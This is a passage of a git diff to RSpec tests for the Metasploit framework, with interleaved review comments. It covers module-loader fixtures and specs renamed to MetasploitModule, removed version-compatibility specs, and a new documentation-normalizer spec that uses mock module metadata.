diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb new file mode 100644 index 0000000000..0992ae4d3e --- /dev/null +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb @@ -0,0 +1,24 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +# XXX: invalid super class for an auxiliary module +class MetasploitModule < Msf::Exploit + # XXX: auxiliary modules don't use Rank + Rank = LowRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Untidy Auxiliary Module for RSpec' + 'Description' => 'Test!' + }, + 'Author' => %w(Unknown), + 'License' => MSF_LICENSE, + ) + ) + end +end diff --git a/spec/file_fixtures/modules/payloads/payload_tidy.rb b/spec/file_fixtures/modules/payloads/payload_tidy.rb new file mode 100644 index 0000000000..a20c8dcea8 --- /dev/null +++ b/spec/file_fixtures/modules/payloads/payload_tidy.rb @@ -0,0 +1,17 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +module Metasploit + def initialize(info = {}) + super( + merge_info( + info, + 'Name' => 'Tidy Payload for RSpec', + 'Description' => 'Test!' + ) + ) + end +end diff --git a/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb index a2aab3f53a..83deb96d6c 100644 --- a/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb +++ b/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb @@ -1,4 +1,5 @@ require 'msf/core' +require 'spec_helper' RSpec.describe Msf::Exploit::Remote::BrowserAutopwn2 do 
@@ -759,19 +760,6 @@ RSpec.describe Msf::Exploit::Remote::BrowserAutopwn2 do describe 'when outputing' do - # Get stdout: - # http://stackoverflow.com/questions/11349270/test-output-to-command-line-with-rspec - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - before(:example) do allow(subject).to receive(:print_status) { |arg| $stdout.puts arg } allow(subject).to receive(:print_line) { |arg| $stdout.puts arg } @@ -873,4 +861,4 @@ RSpec.describe Msf::Exploit::Remote::BrowserAutopwn2 do end -end \ No newline at end of file +end diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index 3e19e93fa7..d792b31f02 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb @@ -323,14 +323,12 @@ RSpec.describe Msf::Exploit::Powershell do end context 'when method is unknown' do - before do - subject.datastore['Powershell::method'] = 'blah' - end it 'should raise an exception' do except = false begin + subject.datastore['Powershell::method'] = 'blah' subject.cmd_psh_payload(payload, arch) - rescue RuntimeError + rescue Msf::OptionValidateError except = true end expect(except).to be_truthy diff --git a/spec/lib/msf/core/modules/loader/base_spec.rb b/spec/lib/msf/core/modules/loader/base_spec.rb index d85bbea547..ef058b2fed 100644 --- a/spec/lib/msf/core/modules/loader/base_spec.rb +++ b/spec/lib/msf/core/modules/loader/base_spec.rb @@ -12,7 +12,7 @@ RSpec.describe Msf::Modules::Loader::Base do let(:malformed_module_content) do <<-EOS - class Metasploit3 + class Metasploit # purposeful typo to check that module path is used in backtrace inclde Exploit::Remote::Tcp end 
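Review bot: In the `powershell_spec.rb` hunk, the 'when method is unknown' example now has both the datastore assignment and `cmd_psh_payload` inside one `begin`/`rescue`, so it passes whichever of the two raises `Msf::OptionValidateError`. The flag-and-rescue shape also reports only "expected false to be truthy" when nothing raises. The matcher form states the intent and gives a useful failure: `expect { subject.cmd_psh_payload(payload, arch) }.to raise_error(Msf::OptionValidateError)`, with `subject.datastore['Powershell::method'] = 'blah'` kept outside the block if the call is what should raise. The example's closing `end` lies outside the hunk.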
@@ -21,7 +21,7 @@ RSpec.describe Msf::Modules::Loader::Base do let(:module_content) do <<-EOS - class Metasploit3 < Msf::Auxiliary + class MetasploitModule < Msf::Auxiliary # fully-qualified name is Msf::GoodRanking, so this will failing if lexical scope is not captured Rank = GoodRanking end @@ -223,7 +223,7 @@ RSpec.describe Msf::Modules::Loader::Base do context 'instance methods' do let(:module_manager) do - double('Module Manager', :module_load_error_by_path => {}) + double('Module Manager', :module_load_error_by_path => {}, :module_load_warnings => {}) end subject do @@ -309,7 +309,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod617578696c696172792f72737065632f6d6f636b - class Metasploit3 < Msf::Auxiliary + class MetasploitModule < Msf::Auxiliary end end 
@@ -424,51 +424,12 @@ RSpec.describe Msf::Modules::Loader::Base do allow(error).to receive(:backtrace).and_return(backtrace) end - context 'with version compatibility' do - before(:example) do - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - end - - it 'should record the load error using the original error' do - expect(subject).to receive(:load_error).with(module_path, error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - end - - context 'without version compatibility' do - let(:version_compatibility_error) do - Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => infinity, - :minimum_core_version => infinity - ) - end - - let(:infinity) do - 0.0 / 0.0 - end - - before(:example) do - allow(@namespace_module).to receive( - :version_compatible! - ).with( - module_path, - module_reference_name - ).and_raise( - version_compatibility_error - ) - end - - it 'should record the load error using the Msf::Modules::VersionCompatibilityError' do - expect(subject).to receive(:load_error).with(module_path, version_compatibility_error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end + it 'should record the load error using the original error' do + expect(subject).to receive(:load_error).with(module_path, error) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey end it 'should return false' do - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey end end 
@@ -479,9 +440,13 @@ RSpec.describe Msf::Modules::Loader::Base do @namespace_module = double('Namespace Module') allow(@namespace_module).to receive(:parent_path=) allow(@namespace_module).to receive(:module_eval_with_lexical_scope).with(module_content, module_path) - - metasploit_class = double('Metasploit Class', :parent => @namespace_module) - allow(@namespace_module).to receive(:metasploit_class!).and_return(metasploit_class) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit3', false).and_return(false) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit4', false).and_return(false) + allow(@namespace_module).to receive(:const_defined?).with('MetasploitModule', false).and_return(true) + allow(@namespace_module).to receive(:const_get).with('Metasploit3', false).and_return(false) + allow(@namespace_module).to receive(:const_get).with('Metasploit4', false).and_return(false) + allow(@namespace_module).to receive(:const_get).with('MetasploitModule', false).and_return(true) + allow(@namespace_module).to receive(:module_load_warnings) allow(subject).to receive(:namespace_module_transaction).and_yield(@namespace_module) 
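Review bot: The six `const_defined?`/`const_get` stubs added to `@namespace_module` look unused. The following hunk (`@@ -489,210 +454,83 @@`) adds `allow(subject).to receive(:namespace_module_transaction).and_call_original`; if that sits in the same `before` block, as the line numbers suggest, it replaces the `and_yield(@namespace_module)` stub before any example runs. The `const_get` stubs also return `false`/`true` where the real method returns the constant itself, so they would mislead if they were ever reached. Either drop the double and its stubs, or keep the double in play and return a class double from `const_get('MetasploitModule', false)`. The `before` block starts above this hunk.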
@@ -489,210 +454,83 @@ RSpec.describe Msf::Modules::Loader::Base do @module_load_error_by_path = {} allow(module_manager).to receive(:module_load_error_by_path).and_return(@module_load_error_by_path) + allow(module_manager).to receive(:on_module_load) + # remove the mocked namespace_module since happy-path/real loading is occurring in this context + allow(subject).to receive(:namespace_module_transaction).and_call_original end - it 'should check for version compatibility' do + it 'should log load information' do + expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_2) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + end + + it 'should delete any pre-existing load errors from module_manager.module_load_error_by_path' do + original_load_error = "Back in my day this module didn't load" + module_manager.module_load_error_by_path[module_path] = original_load_error + + expect(module_manager.module_load_error_by_path[module_path]).to eq original_load_error + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + expect(module_manager.module_load_error_by_path[module_path]).to be_nil + end + + it 'should return true' do + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + end + + it 'should call module_manager.on_module_load' do expect(module_manager).to receive(:on_module_load) - - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - subject.load_module(parent_path, type, module_reference_name) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy end - context 'without version compatibility' do - let(:version_compatibility_error) do - Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => infinity, - :minimum_core_version => infinity - ) - end - - let(:infinity) do - 
0.0 / 0.0 - end - - before(:example) do - allow(@namespace_module).to receive( - :version_compatible! - ).with( - module_path, - module_reference_name - ).and_raise( - version_compatibility_error - ) - end - - it 'should record the load error' do - expect(subject).to receive(:load_error).with(module_path, version_compatibility_error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do + context 'with :recalculate_by_type' do + it 'should set the type to be recalculated' do + recalculate_by_type = {} + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :recalculate_by_type => recalculate_by_type + ) + ).to eq true + expect(recalculate_by_type[type]).to be_truthy end end - context 'with version compatibility' do - before(:example) do - allow(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) + context 'with :count_by_type' do + it 'should set the count to 1 if it does not exist' do + count_by_type = {} - allow(module_manager).to receive(:on_module_load) + expect(count_by_type.has_key?(type)).to be_falsey + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :count_by_type => count_by_type + ) + ).to eq true + expect(count_by_type[type]).to eq 1 end - context 'without metasploit_class' do - let(:error) do - Msf::Modules::MetasploitClassCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name + it 'should increment the count if it does exist' do + original_count = 1 + count_by_type = { + type => original_count + } + + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :count_by_type => count_by_type ) - end + ).to eq true - before(:example) do - expect(@namespace_module).to 
receive(:metasploit_class!).with(module_path, module_reference_name).and_raise(error) - end - - it 'should record load error' do - expect(subject).to receive( - :load_error - ).with( - module_path, - kind_of(Msf::Modules::MetasploitClassCompatibilityError) - ) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - expect(Msf::Modules.const_defined?(relative_name)).to be_truthy - expect(Msf::Modules.const_get(relative_name)).to eq @original_namespace_module - end - end - - context 'with metasploit_class' do - let(:metasploit_class) do - double('Metasploit Class') - end - - before(:example) do - allow(@namespace_module).to receive(:metasploit_class!).and_return(metasploit_class) - end - - it 'should check if it is usable' do - expect(subject).to receive(:usable?).with(metasploit_class).and_return(true) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - context 'without usable metasploit_class' do - before(:example) do - expect(subject).to receive(:usable?).and_return(false) - end - - it 'should log information' do - expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_1) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - expect(Msf::Modules.const_defined?(relative_name)).to be_truthy - expect(Msf::Modules.const_get(relative_name)).to eq @original_namespace_module - end - end - - context 'with usable 
metasploit_class' do - before(:example) do - # remove the mocked namespace_module since happy-path/real loading is occurring in this context - allow(subject).to receive(:namespace_module_transaction).and_call_original - end - - it 'should log load information' do - expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_2) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - it 'should delete any pre-existing load errors from module_manager.module_load_error_by_path' do - original_load_error = "Back in my day this module didn't load" - module_manager.module_load_error_by_path[module_path] = original_load_error - - expect(module_manager.module_load_error_by_path[module_path]).to eq original_load_error - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - expect(module_manager.module_load_error_by_path[module_path]).to be_nil - end - - it 'should return true' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - it 'should call module_manager.on_module_load' do - expect(module_manager).to receive(:on_module_load) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - context 'with :recalculate_by_type' do - it 'should set the type to be recalculated' do - recalculate_by_type = {} - - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :recalculate_by_type => recalculate_by_type - ) - ).to eq true - expect(recalculate_by_type[type]).to be_truthy - end - end - - context 'with :count_by_type' do - it 'should set the count to 1 if it does not exist' do - count_by_type = {} - - expect(count_by_type.has_key?(type)).to be_falsey - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :count_by_type => count_by_type - ) - ).to eq true - expect(count_by_type[type]).to eq 1 - end - - it 'should increment the count if it does exist' do - 
original_count = 1 - count_by_type = { - type => original_count - } - - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :count_by_type => count_by_type - ) - ).to eq true - - incremented_count = original_count + 1 - expect(count_by_type[type]).to eq incremented_count - end - end - end + incremented_count = original_count + 1 + expect(count_by_type[type]).to eq incremented_count end end end @@ -944,7 +782,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod617578696c696172792f72737065632f6d6f636b - class Metasploit3 + class Metasploit end end @@ -978,7 +816,7 @@ RSpec.describe Msf::Modules::Loader::Base do expect(namespace_module).not_to eq @existent_namespace_module expect { - namespace_module::Metasploit3 + namespace_module::MetasploitModule }.to raise_error(NameError) true @@ -1239,7 +1077,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod0 - class Metasploit3 + class Metasploit end end 
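Review bot: In the `@@ -978,7 +816,7 @@` hunk, `expect { namespace_module::MetasploitModule }.to raise_error(NameError)` appears to have become vacuous, assuming the pre-existing namespace module it guards against is the one edited in the `@@ -944,7 +782,7 @@` hunk. That fixture now declares `class Metasploit`, so `MetasploitModule` is undefined in both the old and the new namespace, and the lookup raises whether or not the namespace was recreated. The fixture and the lookup should name the same constant; `class MetasploitModule` in the fixture keeps the check meaningful. The `@@ -1239,7 +1077,7 @@` fixture is renamed to `Metasploit` as well and is worth checking for the same mismatch.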
@@ -1339,50 +1177,5 @@ RSpec.describe Msf::Modules::Loader::Base do subject.send(:typed_path, type, module_reference_name) end end - - context '#usable?' do - context 'without metasploit_class responding to is_usable' do - it 'should return true' do - metasploit_class = double('Metasploit Class') - expect(metasploit_class).not_to respond_to(:is_usable) - - expect(subject.send(:usable?, metasploit_class)).to be_truthy - end - end - - context 'with metasploit_class responding to is_usable' do - it 'should delegate to metasploit_class.is_usable' do - # not a proper return, but guarantees that delegation is actually happening - usability = 'maybe' - metasploit_class = double('Metasploit Class', :is_usable => usability) - - expect(subject.send(:usable?, metasploit_class)).to eq usability - end - - context 'with error from metasploit_class.is_usable' do - let(:error) do - 'Expected error' - end - - let(:metasploit_class) do - metasploit_class = double('Metasploit Class') - - expect(metasploit_class).to receive(:is_usable).and_raise(error) - - metasploit_class - end - - it 'should log error' do - expect(subject).to receive(:elog).with(/#{error}/) - - subject.send(:usable?, metasploit_class) - end - - it 'should return false' do - expect(subject.send(:usable?, metasploit_class)).to be_falsey - end - end - end - end end end diff --git a/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb b/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb deleted file mode 100644 index e4daf5f67c..0000000000 --- a/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb +++ /dev/null @@ -1,8 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -require 'msf/core/modules/metasploit_class_compatibility_error' - -RSpec.describe Msf::Modules::MetasploitClassCompatibilityError do - it_should_behave_like 'Msf::Modules::Error subclass #initialize' -end 
diff --git a/spec/lib/msf/core/modules/namespace_spec.rb b/spec/lib/msf/core/modules/namespace_spec.rb
deleted file mode 100644
index 937920bdfd..0000000000
--- a/spec/lib/msf/core/modules/namespace_spec.rb
+++ /dev/null
@@ -1,268 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -require 'msf/core' -require 'msf/core/modules/namespace' - -RSpec.describe Msf::Modules::Namespace do - let(:module_path) do - "parent/path/type_directory/#{module_reference_name}.rb" - end - - let(:module_reference_name) do - 'module/reference/name' - end - - subject do - mod = Module.new - mod.extend described_class - - mod - end - - context 'metasploit_class' do - before(:example) do - if major - subject.const_set("Metasploit#{major}", Class.new) - end - end - - context 'without Metasploit<n> constant defined' do - let(:major) do - nil - end - - it 'should not be defined' do - metasploit_constants = subject.constants.select { |constant| - constant.to_s =~ /Metasploit/ - } - - expect(metasploit_constants).to be_empty - end - end - - context 'with Metasploit1 constant defined' do - let(:major) do - 1 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit1')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit2 constant defined' do - let(:major) do - 2 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit2')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit3 constant defined' do - let(:major) do - 3 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit3')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit4 constant defined' do - let(:major) do - 4 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit4')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit5 constant defined' do - let(:major) do - 5 - end - - it 'should be 
defined' do - expect(subject.const_defined?('Metasploit5')).to be_truthy - end - - it 'should be newer than Msf::Framework::Major' do - expect(major).to be > Msf::Framework::Major - end - - it 'should return nil' do - expect(subject.metasploit_class).to be_nil - end - end - end - - context 'metasploit_class!' do - it 'should call metasploit_class' do - expect(subject).to receive(:metasploit_class).and_return(Class.new) - - subject.metasploit_class!(module_path, module_reference_name) - end - - context 'with metasploit_class' do - let(:metasploit_class) do - Class.new - end - - before(:example) do - allow(subject).to receive(:metasploit_class).and_return(metasploit_class) - end - - it 'should return the metasploit_class' do - expect(subject.metasploit_class!(module_path, module_reference_name)).to eq metasploit_class - end - end - - context 'without metasploit_class' do - before(:example) do - allow(subject).to receive(:metasploit_class) - end - - it 'should raise a Msf::Modules::MetasploitClassCompatibilityError' do - expect { - subject.metasploit_class!(module_path, module_reference_name) - }.to raise_error(Msf::Modules::MetasploitClassCompatibilityError) - end - - context 'the Msf::Modules::MetasploitClassCompatibilityError' do - it 'should include the module path' do - error = nil - - begin - subject.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error - end - - expect(error).not_to be_nil - expect(error.to_s).to include(module_path) - end - - it 'should include the module reference name' do - error = nil - - begin - subject.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error - end - - expect(error).not_to be_nil - expect(error.to_s).to include(module_reference_name) - end - end - end - end - - context 'version_compatible!' 
do - context 'without RequiredVersions' do - it 'should not be defined' do - expect(subject.const_defined?('RequiredVersions')).to be_falsey - end - - it 'should not raise an error' do - expect { - subject.version_compatible!(module_path, module_reference_name) - }.to_not raise_error - end - end - - context 'with RequiredVersions defined' do - let(:minimum_api_version) do - 1 - end - - let(:minimum_core_version) do - 1 - end - - before(:example) do - subject.const_set( - :RequiredVersions, - [ - minimum_core_version, - minimum_api_version - ] - ) - end - - context 'with minimum Core version' do - it 'is <= Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_core_version.to_s)).to be <= Metasploit::Framework::Core::GEM_VERSION - end - - context 'without minimum API version' do - let(:minimum_api_version) do - 2 - end - - it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - - context 'with minimum API version' do - it 'should not raise an error' do - expect { - subject.version_compatible!(module_path, module_reference_name) - }.to_not raise_error - end - end - end - - context 'without minimum Core version' do - let(:minimum_core_version) do - 5 - end - - it 'is > Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_core_version.to_s)).to be > Metasploit::Framework::Core::GEM_VERSION - end - - context 'without minimum API version' do - let(:minimum_api_version) do - 2 - end - - it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - - 
context 'with minimum API version' do - it 'is <= Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be <= Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - end - end - end -end diff --git a/spec/lib/msf/core/modules/version_compatibility_error_spec.rb b/spec/lib/msf/core/modules/version_compatibility_error_spec.rb deleted file mode 100644 index 8e732966a3..0000000000 --- a/spec/lib/msf/core/modules/version_compatibility_error_spec.rb +++ /dev/null 
@@ -1,63 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -RSpec.describe Msf::Modules::VersionCompatibilityError do - it_should_behave_like 'Msf::Modules::Error subclass #initialize' do - let(:minimum_api_version) do - 1 - end - - let(:minimum_core_version) do - 2 - end - - it 'should say cause was version check' do - expect(subject.to_s).to match(/due to version check/) - end - - context 'with :minimum_api_version' do - subject do - described_class.new( - :minimum_api_version => minimum_api_version - ) - end - - it 'should set minimum_api_version' do - expect(subject.minimum_api_version).to eq minimum_api_version - end - - it 'should include minimum_api_version in error' do - expect(subject.to_s).to match(/due to version check \(requires API >= #{minimum_api_version}\)/) - end - end - - context 'with :minimum_api_version and :minimum_core_version' do - subject do - described_class.new( - :minimum_api_version => minimum_api_version, - :minimum_core_version => minimum_core_version - ) - end - - it 'should include minimum_api_version and minimum_core_version in error' do - expect(subject.to_s).to match(/due to version check \(requires API >= #{minimum_api_version} and Core >= #{minimum_core_version}\)/) - end - end - - context 'with :minimum_core_version' do - subject do - described_class.new( - :minimum_core_version => minimum_core_version - ) - end - - it 'should set minimum_core_version' do - expect(subject.minimum_core_version).to eq minimum_core_version - end - - it 'should include minimum_core_version in error' do - expect(subject.to_s).to match(/due to version check \(requires Core >= #{minimum_core_version}\)/) - end - end - end -end diff --git a/spec/lib/msf/db_manager_spec.rb b/spec/lib/msf/db_manager_spec.rb index 47ee28d2ec..9263da301e 100644 --- a/spec/lib/msf/db_manager_spec.rb +++ b/spec/lib/msf/db_manager_spec.rb 
@@ -52,5 +52,4 @@ RSpec.describe Msf::DBManager do it { is_expected.to respond_to :error } it { is_expected.to respond_to :initialize_database_support } it { is_expected.to respond_to :service_name_map } - it { is_expected.to respond_to :warn_about_rubies } end diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb index 66a8edcde3..28605ad12b 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb @@ -340,6 +340,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do " Amap Log", " Amap Log -m", " Appscan", + " Burp Issue XML", " Burp Session XML", " CI", " Foundstone", diff --git a/spec/lib/msf/util/document_generator/normalizer_spec.rb b/spec/lib/msf/util/document_generator/normalizer_spec.rb new file mode 100644 index 0000000000..c3a539aa8a --- /dev/null +++ b/spec/lib/msf/util/document_generator/normalizer_spec.rb 
@@ -0,0 +1,258 @@ +require 'rex' +require 'msf/util/document_generator' +require 'msf/util/document_generator/pull_request_finder' + +RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do + + let(:mod_description) { 'MS08-067 netapi double' } + let(:mod_authors) { [ 'sinn3r' ] } + let(:mod_fullname) { 'exploit/windows/smb/ms08_067_netapi' } + let(:mod_shortname) { 'ms08_067_netapi' } + let(:mod_name) { 'MS08-067' } + let(:mod_pull_requests) { good_pull_requests } + let(:mod_refs) { ['URL', 'http://example.com'] } + let(:mod_platforms) { 'win' } + let(:mod_options) { { 'RHOST' => rhost_option } } + let(:mod_normal_rank) { 300 } + let(:mod_type) { 'exploit' } + + let(:good_pull_requests) do + { + '1234' => { title: 'Merged Pull Request' } + } + end + + let(:mod_targets) do + target = double('target') + allow(target).to receive(:name).and_return('Automatic') + [target] + end + + let(:bad_pull_requests) do + exp = Msf::Util::DocumentGenerator::PullRequestFinder::Exception.new + allow(exp).to receive(:message).and_return('GITHUB_OAUTH_TOKEN') + exp + end + + let(:rhost_option) do + owner = double('Msf::Exploit::Remote::SMB::Client') + option = double('Msf::OptAddress') + allow(option).to receive(:name).and_return('RHOST') + allow(option).to receive(:advanced).and_return(false) + allow(option).to receive(:evasion).and_return(false) + allow(option).to receive(:required).and_return(true) + allow(option).to receive(:desc).and_return('The target address') + allow(option).to receive(:default).and_return(nil) + allow(option).to receive(:owner).and_return(owner) + option + end + + let(:msf_mod) do + mod = double('Msf::Module') + mod_info = { 'Author' => mod_authors, 'Platform' => mod_platforms } + allow(mod).to receive(:description).and_return(mod_description) + allow(mod).to receive(:module_info).and_return(mod_info) + allow(mod).to receive(:fullname).and_return(mod_fullname) + allow(mod).to receive(:name).and_return(mod_name) + allow(mod).to 
receive(:references).and_return(mod_refs) + allow(mod).to receive(:platforms).and_return(mod_platforms) + allow(mod).to receive(:authors).and_return(mod_authors) + allow(mod).to receive(:rank).and_return(mod_normal_rank) + allow(mod).to receive(:options).and_return(mod_options) + allow(mod).to receive(:type).and_return(mod_type) + allow(mod).to receive(:shortname).and_return(mod_shortname) + allow(mod).to receive(:targets).and_return(mod_targets) + mod + end + + + subject do + described_class.new + end + + describe '#get_md_content' do + context 'when metadata is given' do + it 'returns the documentation in HTML' do + items = { + mod_description: msf_mod.description, + mod_authors: msf_mod.send(:module_info)['Author'], + mod_fullname: msf_mod.fullname, + mod_name: msf_mod.name, + mod_pull_requests: good_pull_requests, + mod_refs: msf_mod.references, + mod_rank: msf_mod.rank, + mod_platforms: msf_mod.send(:module_info)['Platform'], + mod_options: msf_mod.options, + mod_demo: msf_mod + } + expect(subject.get_md_content(items, '')).to include('<html>') + end + end + end + + describe '#load_css' do + it 'loads CSS from file' do + expect(subject.send(:load_css)).to include('color: #0069d6') + end + end + + describe '#md_to_html' do + let(:md) do + %Q|# Hello world!| + end + + context 'when a markdown file is given' do + it 'returns the documentation in HTML' do + expect(subject.send(:md_to_html, md, '')).to include('<h1>Hello world!</h1>') + end + end + end + + describe 'normalize_pull_requests' do + context 'when a hash of pull requests are given' do + it 'returns HTML links' do + expect(subject.send(:normalize_pull_requests, good_pull_requests)).to include('* <a href=') + end + end + + context 'when PullRequestFinder::Exception is raised' do + it 'includes a how-to link in the error message' do + how_to_link = 'https://help.github.com/articles/creating-an-access-token-for-command-line-use/' + expect(subject.send(:normalize_pull_requests, bad_pull_requests)).to 
include(how_to_link) + end + end + end + + describe 'normalize_options' do + context 'when datastore options are given' do + it 'returns a list of options in HTML' do + expect(subject.send(:normalize_options, msf_mod.options)).to include('* RHOST - The target address') + end + end + end + + describe 'normalize_description' do + context 'when a description is a long one-liner' do + it 'returns the wrapped the description' do + desc = 'description ' * 20 + expect(subject.send(:normalize_description, desc)).to include("\ndescription") + end + end + end + + describe 'normalize_authors' do + context 'when an array of authors is given' do + it 'returns the author list in markdown' do + expect(subject.send(:normalize_authors, Rex::Text.html_decode(msf_mod.authors))).to include('* ') + end + end + end + + describe 'normalize_targets' do + context 'when an array of targets is given' do + it 'returns the target list in HTML' do + expect(subject.send(:normalize_targets, msf_mod.targets)).to include('* Automatic') + end + end + end + + describe 'normalize_references' do + context 'when an array of references is given' do + it 'returns the reference list in HTML' do + expect(subject.send(:normalize_references, msf_mod.references)).to include('* <a href=') + end + end + end + + describe 'normalize_platforms' do + context 'when platforms win and linux are given' do + it 'returns the markdown with windows and linux' do + platforms = ['win', 'linux'] + + platforms.each do |platform| + expect(subject.send(:normalize_platforms, platforms)).to include("* #{platform}") + end + end + end + + context 'when a platform as a string is given' do + it 'returns the platform' do + expect(subject.send(:normalize_platforms, msf_mod.platforms)).to eq(mod_platforms) + end + end + end + + describe 'normalize_rank' do + context 'when a rank is given' do + it 'returns the rank' do + expect(subject.send(:normalize_rank, msf_mod.rank)).to include('Normal') + end + + it 'includes a wiki about exploit 
